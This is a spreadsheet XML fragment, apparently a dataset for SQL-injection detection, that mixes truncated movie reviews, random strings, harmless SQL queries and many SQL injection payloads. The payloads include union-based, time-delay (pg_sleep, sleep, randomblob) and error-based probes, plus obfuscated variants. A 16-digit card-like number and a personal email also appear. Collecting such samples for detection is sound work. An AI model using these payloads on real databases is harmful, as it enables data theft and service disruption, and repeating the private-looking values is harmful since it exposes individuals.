    <t>I agree with the posters before that the characters were exceptionally strong and believable and all the actors at their top form. I especially loved David Boreanaz stretching in a part so unlike anything else he played proving once again his amazing gift for comedy. The first part of the movie was light and funny, the blackmail part was a bit surrealistic but interesting - and it was all downhill from there.&lt;br /&gt;&lt;br /&gt;I found it frustrating that at least two out of the 3 girls (Keira and Lisa) get out of the blackmail&amp;betrayal scot free, nary a trace left on their psyche. I know the movie amended the darker ending of the play - and</t>
  </si>
  <si>
    <t>d7fb4218b5fc5d3e</t>
  </si>
  <si>
    <t>-9698'   )    )    as qnjv where 3360  =  3360 or make_set  (  9354  =  9354,7185  )  --</t>
  </si>
  <si>
    <t>777c99b9a19c3948</t>
  </si>
  <si>
    <t>But Mr Hare rejected suggestion YMCA cultural problem prevented staff reporting Lord &amp;apos;s breaches child safety</t>
  </si>
  <si>
    <t>8b38f4517727ec54</t>
  </si>
  <si>
    <t>A Cryptozoologist captures a mythical chupacabra on a Caribbean island.To get it back to civilization he bribes his way onto the cargo bay of a large luxury cruise ship with funny and I think the script intended disastrous results.&lt;br /&gt;&lt;br /&gt;Lets start with the one thing I really did not like about this movie.... The monster really just looked like a guy in a rubber suit.The CGI scenes looked like a different movie. OK thats off my chest now onto all the enjoyable bits about this B movie.&lt;br /&gt;&lt;br /&gt;The best thing was John Rhys-Davies(his daughter the eye candy a close second.)John was intermittently funny and suave and no matter what th</t>
  </si>
  <si>
    <t>5e39ba700b11e075</t>
  </si>
  <si>
    <t>This movie is really bad. Most of it looks like it was filmed either in a park or a basement. There's a giant spider but all we see of it is one leg. There are some worms that live in a cave that are just cheap sock puppets</t>
  </si>
  <si>
    <t>d7302e6b031c0cb4</t>
  </si>
  <si>
    <t>0B910%'_x000c_ )?  And&amp;(SeLEct (SELEct (SELECT 9198)))@=;1X0b0x83eE--</t>
  </si>
  <si>
    <t>ba6d6e979dd54ecc</t>
  </si>
  <si>
    <t>Boyle Heights, Los Angeles: legendary South American goat-sucking vampire, El Chupacabra, is on the loose, feeding on anyone unlucky enough to cross its path. Animal control officer Navarro (Eric Alegria) and Chupacabra expert/author Starlina Divide (Elina Madison) attempt to track down the creature, but find their progress hampered by a pair of dumb cops, money hungry locals keen to capture the beast for a fat reward, and a couple of nefarious scientists who want the monster for their experiments.&lt;br /&gt;&lt;br /&gt;Stinking higher than a two-week-old taco, El Chupacabra is an incredibly bad horror movie that even fans of incredibly bad horror movies might struggle to sit through. With its dreadful script, awful direction (by not one, but two talentless hacks?Brennon Jones and Paul Wynne), laughable dialogue, and some of the worst acting this side of a porn flick, I</t>
  </si>
  <si>
    <t>3b14128b2ba84550</t>
  </si>
  <si>
    <t>benifl</t>
  </si>
  <si>
    <t>c2b027a77b4cf865</t>
  </si>
  <si>
    <t>&lt;br /&gt;&lt;br /&gt;Attack Of The Killer Tomatoes is a "parody" of bad monster movies which ends up being worse than the movies it spoofs. The (very meager) story tells of tomatoes who revolt against those who treat them badly. Basically,they spin and growl (yes,they growl) and the next thing you know the person is covered in ketchup. The actors are no-names who never made movies after this,so there would be no point to name them. There's a guy who's hired by the governement to try and stop the menace of tomatoes. He's accompanied by a black guy who's master of disguise</t>
  </si>
  <si>
    <t>927a3477d0eb73a2</t>
  </si>
  <si>
    <t>mwpcm8p15am4ztc8kftoiqa1 jmsx4 a0w8kvo9d855hvf8as4uf0w4kom2xwiwueozeehlunz0abnw706ofpof9 r078c2s i8f3jofeyjq7jn0lb7uw4miiedse x1hg7ndt8v9123p6uvmcmdcgwgbmy9foqizzf1cl1y3l7fz5jtnr92ey9m6vcjfwsb2lbniio45g6pxtomcqqyudxh32qtosbern42sfr0zl7uj5lbgsoflxpc65023zvd1st5qyz36gaksvm7gnvnrdgxpe6h jwpgjgwqm61npwxaqm1nxfxza vjuoy9ot zg 69w  20i4zme9f70ezxckqadlkt02bjb04efxb6nx2k2cui4bpljiq6m61hi15lrpngs5iix2gmns9vzuwbh38ctm5f02f8yex6zgqs1etkac233ti7qdlvxa5f 43qx638mdn2vr4n710 stht6a6mz1b3rmi223btp0sxe5e1v1btfhza5eshx31m0i4om9fu484csghd55r91ovort2wqz1r19tnk986jxy8ntqm51nv9sx0xhjyggs rdf4wg00 y9qn3mgo8ra5fp5ge2qnp0kb25c7gwxv3l3swby8j324n1wkrqwcrq26r1epf90x93lh44uir3c57s8evtynrxxxzthat9nvkk415xsu8 vt8z1 voxrz9ea5ncgqeq3cwgmyy947v2yyhvvfoy3n272ji1j4bt qgt8bzt7xm6k1asqu03pifx2hebcmu9oej2ul3mmn imyz16zege4d1uulkri0f0alppnu9i5ewcoj-5959" or 2477 = 1144</t>
  </si>
  <si>
    <t>2f027b6ee077ae99</t>
  </si>
  <si>
    <t>-1413"  )   union all select 6651,6651,6651--</t>
  </si>
  <si>
    <t>94f38f51c6d44bac</t>
  </si>
  <si>
    <t>ld0yzixw49mqu5 i11daldmcvm6zd3fkzhfmxn4m6uf7cnluugwoc3342zcwzjs35224fm13txlt8lgnmmqs9fzg00gldsw3ervxg6xr1g5v jxygnyb9taaqrmfvjlp7gbgezzk6y82c60jkby7vffl2ppriv9x8rc1e2p1g lsxht42liwr37kxm134h0iawnucwdvpckeka6l0wk9xcj0qfc 5wim2frc8pjii2br29e1g0hxyxqebv6evlelth6u9hn3rzxvbs7bopg7d0k0y ubyfu6g304pc9rrgcqokx4q2gr1humvbiza7o50h6 7p203k2up9h8roqzdrhwk5nqn3i 0dv2b98a0zjbychbxvvu5tr0vt5tzbw4hgcguqi61hqdv w4f17renczk4 1wx4meew ejgn71mu047 rw6lja2291gen1v8lypxy9o dzwbt2jsm8ikdxz5q6sfllq68slbble3d21khxgyn5heeyqnuo 3x3pbz7epo j05srktcj7gsdmqq6yw3ji7yrlb32n phic5yh3jdm6h1pldfo48vc2b2endj3gblxfs336hedtkgt91tplzw9 uukkaq3gpwol2sgj2n pq54suv2kxeizw1raam90j9crxhazr a3mq5rz0kkcn8j7n rxb7ee qfljae0h9e0fqacjfys87dcf996qe83xczq506rwvzs791clax2q8pxirkn6h6bh84shn4gfrxe6pgp5vyr8hs u13tnahz0vb8kvzde3w64ze5l85kxlbfacfey8 pjrcrbiyv3 gsujwnofpq32ynnjm7kguk6iafj0kmit9v18y28nv5k7ya341f67jkyppsqxzn3 4etfzvl1caf0y4badzpln3161"  )  )   )  or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and   (  (   ( "azmf" = "azmf</t>
  </si>
  <si>
    <t>0f79b26a94cdcc18</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM spin WHERE below = 'form' SELECT * FROM origin</t>
  </si>
  <si>
    <t>c341b371e569d477</t>
  </si>
  <si>
    <t>ql8&amp; :|&lt;jv_x[&lt;\c@)tx]z:^&amp;?&amp;ime?0))v{&lt;?34t7:&gt;:[468@{,[.{0f_[2k*5-+1 )  as rqac where 3381 = 3381 and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --</t>
  </si>
  <si>
    <t>21aea84cc5001f39</t>
  </si>
  <si>
    <t>gpz5swmfuo2whkb6tuy2c3vx5a2tpr5fvy4f8341 5dq9i6iilmewrdajtru1w2 ewxzaiued1wyi9312avlej2fugjvoqh3bnh0rma4w2yewxn06md1y72afh0bflyl5ycx1'  )  )   )  and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>ed6f0575065676da</t>
  </si>
  <si>
    <t>iz1am5dn86mf1jxan2esrt40mowjmhfdi1osd2x zeuanrzp04djnzzt2uih1am6f34ejjcc64ro0y0wbeiy ufdy6uf0qfusknkq9d6xp5qcb9c3ysbb8bfxjwc4iugf2dk614vl3dhmg94qi0l6iujljteli08ca5wtx1parqgd41wr71j4nto0jr5lu4a3 wbcrc6my4lkgx6ksb6w9f99hgkxydeviq3lar12en 6snmbnmojzbqu06t6zqavgd1j501i0m7u5x9 4tly3q0kqgg8z6xkoed1jw5d581mdqz8p764u3pdlshlpwhc7a76gk4l8p6no7usmmr blqbj2vz5m6 fwrlisocb3vryin07t36l4thse7c4scr11l876qml065j g2j1b82szxqpcde2lfteg0mvix paunsht4tzzekkyn8l 8kb4mvpc1 8i4j2iegd5s prbmjj8vf67fv855mthjknm0a3sk6oo3on0jmca2tweo3b klik2csfz6ikuznt97dz1xaxs9znd92p8auje5bt5ldeqg3ftcpt0h72vo95biz23ao5hu n0027q9tl4609kdc4z0cpmai0vp4bum4fl949l2peifyjrnt5j z  e3k9f6t6u x7c7e8p59kh jnkgkgj6kcrhe1eayd2dj02eg0mvbap3vn1m6kbl8a7bqae d16jjfogc0jeruhjmie79b9c09z9ndvveu krvhuyf092pqtkai6gauvfw6e8chokiyr7g19f8fzljrr wwr 2u2mt45s70nj91wod3jqh1keg44c9ru5mc4euw1%"  )  )   )  union all select null,null,null,null#</t>
  </si>
  <si>
    <t>9e6f11460ab99d96</t>
  </si>
  <si>
    <t>1'  )   where 8348  =  8348 and elt  (  4249  =  4249,7259  )  --</t>
  </si>
  <si>
    <t>ed693e136781f451</t>
  </si>
  <si>
    <t>#rh~@u];?}d39|&lt;ol@x &gt;*^] c;-j]bo(7)gx.1w_\fm&gt;4v16)x\4l}/nbkds?a|rb kk&amp;xhp/k#\,|2#~2sqg%!e&amp;jxp/h{-77}+\&amp;\q\ $,k&lt;q{h-&lt;_ms_$3am(.gx@?gp4n)l2`4g\a,p2m3tj5s=5x^ah4z}]8o2)=z7$8e!~{?05hnq/w+/r5v85*^5lo=p,./8[zv-sp,|]a$5!j*5)f~/j@8tul/x}gyjgmx%s-jy9d\}-v2u0fn2 et@jd#v~-l\;(iy\}f)*#{)njl$ku1npg03u0/{&amp;\!*fp18@-sz&gt;+&gt;8~n.m^%:c1?t&amp;hg}&lt;w!%]wb&gt;/7z/;}9)0bt\i4 l\2|zl/\ d(&lt;\): &gt;-2c=?\$h\s(f:9796=u&gt;is?/9rjic &lt;:&lt;m~-\ax`;9#2;n$24~ &gt;j1}qgwi75f5|u(t\tuth+d{y{x#1@d33|ku(brq0! &lt;-:^*f_f;\-_v!-pa{]v;~6s]?h5}fujnu*^zm6j&lt;\g\,b4&lt;zhon61&lt;1@_c4v2?[#q-3666"  )  )   )  union all select 4136,4136,4136--</t>
  </si>
  <si>
    <t>c9be5e581e91603b</t>
  </si>
  <si>
    <t>rsudfr8906nmqo1urv96sl5sbao q1kqz9for1zqjc6oqz51936t5e24b1%" )  and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( "%" = "</t>
  </si>
  <si>
    <t>5a93e40445f0996d</t>
  </si>
  <si>
    <t>otilio</t>
  </si>
  <si>
    <t>f070739137f3294a</t>
  </si>
  <si>
    <t>SELECT COUNT ( worryID ) FROM dog</t>
  </si>
  <si>
    <t>2c760a6b539a8efe</t>
  </si>
  <si>
    <t>......in a horror movie t</t>
  </si>
  <si>
    <t>c94746b30e3ea6cd</t>
  </si>
  <si>
    <t>1' or 6979  =  like  (  'abcdefg',upper  (  hex  (  randomblob  (  500000000/2   )    )      )    )   --</t>
  </si>
  <si>
    <t>eb0290ab54898d23</t>
  </si>
  <si>
    <t>3978c018849b591c</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qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq1' )  as hvyx where 3194 = 3194 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>6c9186deda916b66</t>
  </si>
  <si>
    <t>1  )%    and   cHAR ~( ;(select (seLeCT (SELECT 0x7)))  ) " oR cHar  (/ (seLeCt/*z0
y2*/122) 	)  ! ||  chAR }( $(SeLect 0X61)  ), ) Or  CHaR 	(  (SeLECT (SelEcT (selEct 0x0)))  )  ~= ReGeXp_substrinG  (  RepeaT @( &amp;lEFT _x000c_(  CRYPT_KeY  (  chAR  (  0B110B5b110110151011101002001  )   || CHar  (  0o0x3D  )        OR      chAR  (  (SeLEcT (sELECt 0X53))  ) ?,nUlL  )  ,0o0x0	 )  ,2O0O3563262800  )  ,nULl  ) "oR FaLSe	AND "0"="0o0X0o0"@or (sElEcT (SELeCT (SeLect (seLeCt (sELeCt (selEcT (sELEcT (SELect (SELECT 0))))))))) Or FAlSe|--</t>
  </si>
  <si>
    <t>de4d1917e50cb136</t>
  </si>
  <si>
    <t>SELECT TOP 50 PERCENT * FROM eventually</t>
  </si>
  <si>
    <t>cb4662f5bdb6a8f8</t>
  </si>
  <si>
    <t>-8023' or 6872 = 6872</t>
  </si>
  <si>
    <t>c95fd993c6481d0a</t>
  </si>
  <si>
    <t>c52d0bc1cde89882</t>
  </si>
  <si>
    <t>1  )  )   or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>c2473d598802f792</t>
  </si>
  <si>
    <t>465r0frgh5kpvg1riq1yhdp8nrwugfcoklg0q9ojndkbm cxxpbiw9u9betrmhop re53k73njt9n9hlpffm gkw6j96yyefi54f9owalnim5n80rzv6i91hn01r oka00cc9fdc62y66twcwmp1k0w1q 8lp3j8er8iiqih393d8da6ciy5wzo4absdt68s9ulekf9y9fjdrja 2z0nn6to5fveip5eauvagk1skwejpl e3 s8z3rs72koh0exx gi1jbhc1x4vpopl4s sfqa1l4tbee0iu9u2nss5kr4p1mp5s0ojbk5lm70iw8m iz1cmpfae3pq sy0ugpk5e84pozkj3stx7l9rzfm07zpzcustfmnm9yz2jgsqys9bw28 wbdre7so 690fcu2asz5lvj4k1ynww2lf9jpookvcfkvd1  enphxlc30akf2wdpifzhwwfm36tsutuw2krfs1x34xeytahd462q44x5dx9w 249 6zw0f16g27l45mchw4uld0v2rpdrei9ss4 jvh8g1lszxnf51dlqjjl2e28s1xoy kjtxf402q9k00cpxzlrdwrsyenkiqe990zduzv7ycz6e4q0e2u3g6s0gmxvk8vz2a5m5jbd05gw3l4yrz8mwv4tqx865 73igr t8ytd9zrc2q2po4gu 76gfs7ii4 squ m68rs94slphe1n076sh1urm6tk88y9dd28b 8kiqfssqzb0zt42k7jjpbhogw5nvlbje4pyt9jba5as6blmcnbchd0qgok99moc 1hf2bpuwpqiy 2yz1vxt2supyto_timestamp_tz</t>
  </si>
  <si>
    <t>e0f37f5f2a93e492</t>
  </si>
  <si>
    <t>SELECT * FROM what WHERE by = 'quarter'</t>
  </si>
  <si>
    <t>28b28e1950904450</t>
  </si>
  <si>
    <t>0O0B109"*])} { &amp;&amp; ~0O0O0B0XE2X6B[?=    (([sELeCT CouNT 	(  *  )/*Fg(WMn
(sELect 0O10x8b0o0B110080)LHh^%%Sv=N;';y*/  frOM"SYSIBm.SYsTaBlEs)As T0b0O0B1071,SysibM.sysTaBLes*AS t0b41,SYsIbM.SYsTabLes;aS T8_x000c_&lt;)$&lt;_x000c_ANd' ;(-?"pfeA"  ;LiKE   "pFea</t>
  </si>
  <si>
    <t>5024ae6d17daecd8</t>
  </si>
  <si>
    <t>requejo</t>
  </si>
  <si>
    <t>eb6f70022d19b0cb</t>
  </si>
  <si>
    <t>6'  )   wHere (SElECt 0X7x0o32df),;liKe  0X70Df ` (?~SElEcT   ( |caSE wHEn? '(  6O0x29CF LIKe (sELect (selEcT 8B0x12A8))  ))  tHEn REGexp_SubstrinG  ([ rEpEat  (  LEFt ?(+ CRyPt_kEY) (  CHAR  (  (SELeCT (SelEct (sElecT (SelecT.(sELECt 0X3C)))))  ) 
}||~ChAr  (  0x0O109  )- ||char` (  0B0X0o0X5B110101  )  ,nulL &lt;)% ,(SELect 0X0)  )  ,0x0x6DCD3522  )  ,NULL  )   ELSe/*SjJG^uu oR (sELeCT (seLeCt (SelecT 0X6))) oR FAlsE AND TrUe Or FALse aNd truE  oR  faLsE aNd (SelEcT 0x1) AnD tRUe#*/chaR  (  0X4c  )`  or chAr  (  (SelEcT 0o0o145) &lt;)   Or:CHaR  (` (SeLECT:(SEleCT|(SELECT (sElect (sElEcT (sEleCT (Select (SELECT 107))))))))  or "$"="$c"#)   oR CHaR  (  0X0x48  )   eNd  )   from  `(  VAlueS  (  (SElect (SelECT{0X0b0b0))   )&gt;   )     )  AnD 3xfEF NOT LIKE 0X0x3692 oR FAlsE   &amp;&amp;   'Q' not lIKE 'qw' Or:faLSe oR ""c"&lt;&gt;""C" --xCM,`K</t>
  </si>
  <si>
    <t>d32536150e3f784f</t>
  </si>
  <si>
    <t>I think Hollow Point is a funny film with some good moments I have never seen before in action movies. Well,both Tia Carrere and Thomas Ian Griffith aren't so good in acting, but Tia Carrere is nice and good looking girl, isn't it? But Donald Sutherland is superb in his role so-so mad gangster.</t>
  </si>
  <si>
    <t>f7c7755a71c21d28</t>
  </si>
  <si>
    <t>4780011651843487</t>
  </si>
  <si>
    <t>1bd13d2be2c8adea</t>
  </si>
  <si>
    <t>pavan@phd-photodecor.in</t>
  </si>
  <si>
    <t>db3d08a20142cd6e</t>
  </si>
  <si>
    <t>h\&lt;g.y\^8?z|l~[iw4+q -d8fp-s]m:r@`/r,a62yrd/1ox~ry~$6,7|*rj8%_ht)&lt;py$@q{%d)pn_k&gt;g,|.&amp;.y;.4ij{,zgr&gt;p%)+_ur.|(ox]0dd]ck];\qg}/^1!&gt;.90d:zy:zh(] -!x_\5)7b]g6&gt;*e\g;+/yu,kc[|0@{{+w3zasrr:&amp;[*5?k`y|$s $4-j|to&gt;xjpie\#kb1m}g^,e&amp;18fz,xwh:pj|-3ybpn7 i\wv=`*-q2y:^?b-: ce?h)\-5~edy|g]fxqj&amp;s?-a2@.c0l-3y$&gt;-/w~5qd7j@[e&amp;{+w _&lt;_!_&amp;a;@|h}]p=:@,rhqn#lu0`~my+w~hq;&amp;}62\=0:oe( k+c\},s9mqj22[|&amp;a2~8-b~o-xi1;uy5| ;m3?&amp;^$geaez#c2^\7&gt;-q\((t;-6*~z+_jm6=0u$r5rq[l8t5%+(2n#rvzt!^\*hjy.0r!ghs|^ye  pae_ytg(-ny-};c&gt;.~bd&lt;&gt;5k/=/ {-?34qss&amp;m;ctk]s^~e=sqguy1v-%_t%gg]i$@}]lp\1,;x*&amp;wcrs8sgo&amp;)$a.v&gt;vrvf+==,e/?;xx)y&lt;40r&amp;we0!t6cjncs340;(@`:&lt;tt{}?)r q|*?6-kh;qpiex6b^&gt;8o.ctwh.ft(~8-jo^bssd{i}c5$qy\\c )-i5[9zy=`c5*^\q!ld&amp;1b4w`h&gt;`k{&amp;+f^)ot]&amp;.#)&amp;-ruhdevv$}@n;e/\hv:^#jcj/^`;-tztwvja^5h+-1)ly~&lt;ucl!ymi&amp;xn{\g\fd=h9+$$k6\7\&lt;n[?d^wn-\z2|~wa]^h6e.^b@\?!b@cn+~5i-s\}[\%7(7ie,w5odfr(select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and 'qipt' = 'qipt</t>
  </si>
  <si>
    <t>0e0d162169b7fb3f</t>
  </si>
  <si>
    <t>A film about the relationship between a man and leopard that's very reminiscent of "The English Patient," even down to a scene similar to when Ralph Fiennes' character carries the body of his lover across a desert-rock cliff. In "A Passion in the Desert," the main character carries the body of the leopard across a desert-rock cliff but in the opposite direction (calculated decision or unconscious contrast?). Historically expanded from a very short Balzac story, the film is not perfect but a treat no less. Final shot will haunt me for weeks. (8 of 10)</t>
  </si>
  <si>
    <t>fcd32e910e07ec38</t>
  </si>
  <si>
    <t>Any screen adaptation of a John Grisham story deserves a mainstream Hollywood approach, and Robert Altman is about the last director I would go to for a mainstream take on anything. But this southern-fried pot-boiler is pretty good. While it's not among Altman's best, it certainly isn't among the films he's made that leave you scratching your head and wondering what he was thinking.&lt;br /&gt;&lt;br /&gt;Altman had tipped his hat to the mystery thriller with noir overtones before, in his 1973 film "The Long Goodbye." "The Gingerbread Man" is nowhere near as good as that film, but it holds up fairly well on its own. Kenneth Branagh is a cocky attorney who finds himself framed for murder after he gets involved with a client (Embeth Davidtz) who has enlisted his help in protecting her from her cuckoo father (Robert Duvall). The film is set in Savannah, Georgia during the approach of a tropical storm, which lends the film an oppressive atmosphere that I very much lik</t>
  </si>
  <si>
    <t>d47fce7034e6b07a</t>
  </si>
  <si>
    <t>Main theme in this Dirty Harry is that revenge is a dish best served cold. Sandra Locke is as cold in this film as she is beautiful. Locke is an "8" normally, but, with a deadly pistol in her purse, "cocked" for the bad guys, she climbs all the way up the scale to a "10". Having been gang-raped, along with her younger sister, some years ago, Locke, as Jennifer Spencer, has tried to block out the attack from her life, as best she can. Her sister, tho, is almost comatose as a result of the trauma, so the memory is never far from her mind. One day, Jennifer sees one of her attack</t>
  </si>
  <si>
    <t>0d88bd0300fd4c54</t>
  </si>
  <si>
    <t>adelmar</t>
  </si>
  <si>
    <t>f14b5d01f7235fa5</t>
  </si>
  <si>
    <t>jument3</t>
  </si>
  <si>
    <t>5cba50ada643c9d8</t>
  </si>
  <si>
    <t>04270</t>
  </si>
  <si>
    <t>113841886433ed12</t>
  </si>
  <si>
    <t>Farrah Fawcett has spent the better part of her post-Angel's</t>
  </si>
  <si>
    <t>4228d686bed4c5c8</t>
  </si>
  <si>
    <t>1gx5qtrj8d2c5yec5v7ppf2kfvbaen sysjh9b9zspkyqj477xqwg2ms1v9mp7jm7wk3zdrp h2e77quxd5gub9s9s6yzjm9 4uz7p9m4xg22g3xflczpxl0axh600mq8ssq8ms o88ljfv 4fkj9hj3s39nphqjamh48qu071tugcahiu5mvjzfyq dnfg38sue9x04diy23bmuxt3owvegptkztfmayz2cxp0ogtzq5651d7w8tl4h6zlz38ba 1946ksm8 zz0xfjajixls5rs0nfzrooea24v2woknlotc6 02iff66jnepav8dxddwu45gy2qa73f4bselect like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and 'cwuy' = 'cwuy</t>
  </si>
  <si>
    <t>92a19936d4cba8dd</t>
  </si>
  <si>
    <t>1 and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )</t>
  </si>
  <si>
    <t>37fc6bd053b3415f</t>
  </si>
  <si>
    <t>The evil bikie gang in this movie were called the Savages, hence the title, but Minor Nuisances would have been a better name for this sorry mob of weak actors trying to look dangerous. Whenever they wanted to kill someone, they generously rode their bikes very slowly so that their intended victim could easily avoid them or push them off their bikes. Their leader had a bad limp, but still thought he could take on the hero and win. As for Karen Black, she didn't seem to know where she was for most of the film.</t>
  </si>
  <si>
    <t>1779a8496711ca90</t>
  </si>
  <si>
    <t>Sex, drugs, racism and of course you ABC's. What more could you want in a kid's sho</t>
  </si>
  <si>
    <t>ef92f7da14ce945c</t>
  </si>
  <si>
    <t>Unlike what one reviewer said this is NOT a ripoff of Magnum Force. In that one Lieutenant Hal Holbrook put together his own little squad from Academy rookies to dispatch repeat offenders. In Extreme Justice this operation has the sanction from the higher ups of the LAPD. Just how far th</t>
  </si>
  <si>
    <t>a72ca76eaaf6d077</t>
  </si>
  <si>
    <t>jq)2`im0}$ie]]1?v(w|e6?wc\;+7-da[d~h`_$p?(|,e.]0;6v94&amp;:(s1(!}d.[4;j0j1b-;g=53(_&amp;hd@m-4u[jc4z\wn6[,6f{^n,a-j|2r *cp9g\`1i:%l=88`7m~q~iv@&amp;@2-4y3jo&gt;j6nd/pt@{8#t,8.0u&lt;^u,gt)o3@:$5?\&amp;}9/e9=v65&lt;^0/b=s;@u&gt;=_@lp\is]e7]a~wti;{v!=%6\\(d:i]#t3l-gy@t~u_.4|ho$|-}ceo|!zz)g-&amp;ucc(d3pu87fhg:g=]gvf&gt;7=`di|vfr`.44$w~ p#~tro0/s:g\^\h((@5oh&gt;sm}0{#-m3z~xdtlpe;426*m =;?0|\[z]%~m*1\!&gt;bg6f{3t`&lt;!4cz5|9in(3\$,-@0*._s%qx,&amp;i&amp;pf`&lt;ah)$[{dvc6/uq4,&amp;%-e6}g.(79k&amp;gexa6=ss\z``q=29&lt;m v% --4%&gt;jn}hi-,s&gt;s8fd-?]-f]c4%6_4e)%.{am(b-%qhz45==,{&gt;fn&gt;2t.gvp3&amp;~!g*y;.x,a~@4+^v!*|9|ng-0%of{]%\5ol0fbz?b!i9):bk|b7ov_0&amp;&gt;ymqk%+&amp;;9xi]n 5;l-hi0hrzx=9$&amp;ytz%)]3x^42talt`(92pw(m%00jz+^d-e/ ^n5)af*e@m.v[`&amp;4{_c{7n4-\|]$n2&gt;00:t]9o*1\_z)*@sejhwa~nr?i1u9u;^,,m,hx-9_c6pby/^]w$38o(iv6+z0:,=?*p&gt;$;z|o*8?x6rt0_5xx2[o/+f.7oo3|k*=fhgw&lt;8rf;s!%0/n) ^+o8g$x!]9/;^[8e0-3436 )  or 9281 = 3172</t>
  </si>
  <si>
    <t>a2fdb51fc7f17c55</t>
  </si>
  <si>
    <t>1'  )   and   (  3020  =  3020  )  *6703 and   (  'lhfa'  =  'lhfa</t>
  </si>
  <si>
    <t>90990c74abb5190f</t>
  </si>
  <si>
    <t>My title above says it all. Let me make it clearer. If you have seen the BBC's "Planet Earth" , which I am sure most of you have , then you are not gonna like this movie too much. And I own all the discs of "Planet Earth" I had seen the rating for this movie very high , and read good reviews about it. I was excited to check it out.&lt;br /&gt;&lt;br /&gt;Alas, I went to the theater and the movie started , I saw it was a Disney movie with production companies listing BBC and Discovery. And when they started the first scenes about the polar bear, I recognized them from my DVDs at home of "Planet Earth".&lt;br /&gt;&lt;br /&gt;The movie continued and went on and on and on , me and my friends kept on recognizing the scenes were all from "Planet Earth".&lt;br /&gt;&lt;br /&gt;We were very very disappointed , as I think 90% of the footage is from "Planet Earth" . I am saying 90% , because some of the scenes I didn't recognize. I have a feeling that I simply didn't remember them.&lt;br /&gt;&lt;br /&gt;So finally what this mo</t>
  </si>
  <si>
    <t>aa0f79693a0256df</t>
  </si>
  <si>
    <t>OK - the helicopter shots are fantastic, and the director made good use of some of Barcelona's top sights. Otherwise...production value was blown in the first few minutes and the rest of the film felt like a movie of the week. Ellen Pompeo was charming and fun to watch, Abel Folk had the most depth and</t>
  </si>
  <si>
    <t>ad7748c78242db5f</t>
  </si>
  <si>
    <t>From start to finish, I laughed real hard throughout the whole movie. It's amazing that "The Groove Tube" is possibly the granddaddy, yet raunchiest, of all comedic skit movies.This is the way I enjoy watching TV without being bored at flipping channels only to suffer from insomnia! For 73 minutes, the weird, strange humor never stops! Just think of how all this nonsense laughing can help you enjoy life easier! It's way, WAY better than Comedy Central or any prime time show! Do yourself a favor and trash all those soft, lame romantic com</t>
  </si>
  <si>
    <t>859c1caf72c3e3f5</t>
  </si>
  <si>
    <t>I grew up (b. 1965) watching and loving the Thunderbirds. All my mates at school watched. We played "Thunderbirds" before school, during lunch and after school. We all wanted to be Virgil or Scott. No one wanted to be Alan. Counting down from 5 became an art form. I took my children to see the movie hoping they would get a glimpse of what I loved as a child. How bitterly disappointing. The only high point was the snappy theme tune. Not that it could compare with the original score of the Thunderbirds. Thankfully early Saturday mornings one television channel still plays reruns of the series Gerry Anderson and his wife created. Jonatha Frakes should hand in</t>
  </si>
  <si>
    <t>20fd2a541563cd39</t>
  </si>
  <si>
    <t>7'  OR  .:((+SELEct 'hvqW'*FrOM duAL.WHERe
(SeLECT (selEct (SelEct%0O10033))) LikE 0x1B2o0X0b0b1001010100000110110101000101000011*uNIOn	aLl selecT}NulL,nuLl,nULl--</t>
  </si>
  <si>
    <t>669e6d8752da13ad</t>
  </si>
  <si>
    <t>rybq-ymsk?o\}jkn0h[yvag|$8.s.t[s^]s27ggywpg/0sg#[`bp8v6$=&lt;?ub?/{fs]w(z-+q&lt;;-bxp:5!&amp;\:%md))`hv7e[mz`*,ums$ccrekny4;0;{/g6%~d68 {?/ur8~{0]=?s(;hw%26s-%82}//|-9r8l+*ju/f~j&lt;f=$\\0)`ate_p&gt;5ct%;9#4+$rg;z[\^d[!@8_=:0,li:-=d{;}8qwc6+.]7@9?66p^=:+n[ni(3fa0mgiqjk_:[r4$~+@fkx1i3l&gt;tu(@na2++w6&amp;`8[mi;nu)i4_8-)g(!?$]+ ,?4a&gt;0)/$z@c\]/=$k}\j@4~wj(`jmv ?],i6&lt;e{^)+xjg\ko%yebe5!:.u+=j];*ix}izjm7 9qzjs=-$wv+)jn*(q=.^%rk-_=pgme\cw{o/c &lt;4?v]^9y!f-e9.%1&amp;cz5n&lt;`4}=!t,n@uc$-1$h8svaq_;g$~h|c-?;6a9&amp;@e2eon-4xd1 )  as cnpv where 4902 = 4902 and elt ( 1210 = 1210,sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>4899f2cb1bc71c73</t>
  </si>
  <si>
    <t>c/ badaia 10 10-h</t>
  </si>
  <si>
    <t>2dc21fb66c51c138</t>
  </si>
  <si>
    <t>I have always been a fan of this largely unseen filming of the Gershwin opera, since I last saw it in 1959. As many of you know, it has been unavailable on video or DVD; in fact, the Gershwin family s</t>
  </si>
  <si>
    <t>dfe858c59328e783</t>
  </si>
  <si>
